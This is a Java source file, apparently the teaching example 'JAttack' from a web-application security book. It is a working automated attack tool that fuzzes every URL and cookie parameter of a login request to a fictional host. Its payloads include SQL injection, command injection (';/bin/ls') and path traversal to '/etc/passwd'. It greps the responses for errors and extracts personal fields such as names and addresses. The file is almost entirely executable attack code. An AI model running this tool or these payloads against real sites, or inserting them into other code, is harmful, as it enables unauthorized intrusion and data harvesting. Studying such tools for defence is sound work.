// JAttack.java // by Dafydd Stuttard import java.net.*; import java.io.*; class Param { String name, value; Type type; boolean attack; Param(String name, String value, Type type, boolean attack) { this.name = name; this.value = value; this.type = type; this.attack = attack; } enum Type { URL, COOKIE, BODY } } interface PayloadSource { boolean nextPayload(); void reset(); String getPayload(); } class PSNumbers implements PayloadSource { int from, to, step, current; PSNumbers(int from, int to, int step) { this.from = from; this.to = to; this.step = step; reset(); } public boolean nextPayload() { current += step; return current <= to; } public void reset() { current = from - step; } public String getPayload() { return Integer.toString(current); } } class PSFuzzStrings implements PayloadSource { static final String[] fuzzStrings = new String[] { "'", ";/bin/ls", "../../../../../../etc/passwd", "xsstest" }; int current = -1; public boolean nextPayload() { current++; return current < fuzzStrings.length; } public void reset() { current = -1; } public String getPayload() { return fuzzStrings[current]; } } class JAttack { // attack config String host = "wahh-app.com"; int port = 82; String method = "GET"; String url = "/app/acc/login.jsp"; Param[] params = new Param[] { new Param("ts", "29813", Param.Type.URL, true), new Param("_DARGS", "/app/acc/login_assumed.jsp", Param.Type.URL, true), new Param("webabacus_id", "131st22418177-1", Param.Type.COOKIE, true), new Param("DYN_USER_ID", "100014981", Param.Type.COOKIE, true), new Param("USER_CONFIRM", "836de5f76c5ec83", Param.Type.COOKIE, true), new Param("ParkoSearch2007", "true", Param.Type.COOKIE, true), new Param("JSESSIONID", "DKBHCAOQQWHFFCKTR", Param.Type.COOKIE, true), new Param("_dyncharset", "UTF-8", Param.Type.URL, true), new Param("_template", "app/inc/templ.jsp", Param.Type.URL, true), new Param("personalDetailsURL", "..%2Facc%2Fregister_p1.jsp", Param.Type.URL, true), new Param("login", "user@wahh-mail.com", Param.Type.URL, true), new Param("originalRedirectFromURL", "+", Param.Type.URL, true), new Param("password", "bestinfw", Param.Type.URL, true), }; // PayloadSource payloads = new PSNumbers(3000, 3010, 1); PayloadSource payloads = new PSFuzzStrings(); static final String[] grepStrings = new String[] { "error", "exception", "illegal", "invalid", "not found", "xsstest" }; static final String[] extractStrings = new String[] { "Name:", "Address:" }; // attack state int currentParam = 0; boolean nextRequest() { if (currentParam >= params.length) return false; if (!params[currentParam].attack) { currentParam++; return nextRequest(); } if (!payloads.nextPayload()) { payloads.reset(); currentParam++; return nextRequest(); } return true; } String buildRequest() { // build parameters StringBuffer urlParams = new StringBuffer(); StringBuffer cookieParams = new StringBuffer(); StringBuffer bodyParams = new StringBuffer(); for (int i = 0; i < params.length; i++) { String value = (i == currentParam) ? payloads.getPayload() : params[i].value; if (params[i].type == Param.Type.URL) urlParams.append(params[i].name + "=" + value + "&"); if (params[i].type == Param.Type.COOKIE) cookieParams.append(params[i].name + "=" + value + "; "); if (params[i].type == Param.Type.BODY) bodyParams.append(params[i].name + "=" + value + "&"); } // build request StringBuffer req = new StringBuffer(); req.append(method + " " + url); if (urlParams.length() > 0) req.append("?" + urlParams.substring(0, urlParams.length() - 1)); req.append(" HTTP/1.0\r\nHost: " + host); if (cookieParams.length() > 0) req.append("\r\nCookie: " + cookieParams.toString()); if (bodyParams.length() > 0) { req.append("\r\nContent-Type: application/x-www-form-urlencoded"); req.append("\r\nContent-Length: " + (bodyParams.length() - 1)); req.append("\r\n\r\n"); req.append(bodyParams.substring(0, bodyParams.length() - 1)); } else req.append("\r\n\r\n"); return req.toString(); } String issueRequest(String req) throws UnknownHostException, IOException { Socket socket = new Socket(host, port); OutputStream os = socket.getOutputStream(); os.write(req.getBytes()); os.flush(); BufferedReader br = new BufferedReader(new InputStreamReader( socket.getInputStream())); StringBuffer response = new StringBuffer(); String line; while (null != (line = br.readLine())) response.append(line); os.close(); br.close(); return response.toString(); } String parseResponse(String response) { StringBuffer output = new StringBuffer(); output.append(response.split("\\s+", 3)[1] + "\t"); output.append(Integer.toString(response.length()) + "\t"); for (String grep : grepStrings) if (response.indexOf(grep) != -1) output.append(grep + "\t"); for (String extract : extractStrings) { int from = response.indexOf(extract); if (from == -1) continue; from += extract.length(); int to = response.indexOf("<", from); if (to == -1) to = response.length(); output.append(response.subSequence(from, to) + "\t"); } return output.toString(); } void doAttack() { System.out.println("param\tpayload\tstatus\tlength"); String output = null; while (nextRequest()) { try { output = parseResponse(issueRequest(buildRequest())); } catch (Exception e) { output = e.toString(); } System.out.println(params[currentParam].name + "\t" + payloads.getPayload() + "\t" + output); } } public static void main(String[] args) { new JAttack().doAttack(); } }